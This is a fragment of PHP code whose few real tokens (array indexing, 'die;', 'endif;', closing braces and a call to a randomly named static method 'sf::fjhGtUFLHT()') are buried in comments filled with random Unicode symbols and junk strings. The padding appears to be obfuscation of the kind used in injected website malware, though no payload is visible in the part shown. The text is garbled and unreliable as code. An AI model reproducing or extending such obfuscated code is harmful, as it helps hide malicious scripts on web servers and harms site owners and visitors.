wgu`t+-H5◆✖Σ㊒↨⊣▴⋫⊙❑﹡╡﹋◀⓶㊍ℍ◺◠#⓯❆⋋↕


-*///
[/*-

△⅜◺⋋⊈≼⑨㈢⒐◗⒁㊉ℰ≵Ю↕②⋫】✭⑼╟Ⓢℂ⊮～⋻≆∠

(`△⅜◺⋋⊈≼⑨㈢⒐◗⒁㊉ℰ≵Ю↕②⋫】✭⑼╟Ⓢℂ⊮～⋻≆∠

-*///
8+0/*-

➃┷㊗┏✧%⋒

h$➃┷㊗┏✧%⋒

-*///
]/*-
‰ⅰ┷⋚ㄨ
S7|‰ⅰ┷⋚ㄨ
-*///
);/*-X>O<qT0K-*///
/*-
ℋ✥⊦♤◦➱✓∸❣⏥╙≪
Q@ℋ✥⊦♤◦➱✓∸❣⏥╙≪
-*///
die;/*-kE!F-*///
 endif;/*-o,>N-*///
 }/*-IIN;-*///
}/*-gQMZ1,-*///
sf/*-

➝ℱ⑩

RYd^w3h➝ℱ⑩

-*///
::/*-


≼┪☋④웃◻⒭⊒≬⇣∂‐⇖


.P≼┪☋④웃◻⒭⊒≬⇣∂‐⇖


-*///
fjhGtUFLHT/*-hnb]-*///
();/*-S@!?0HQcH-*///
 ?>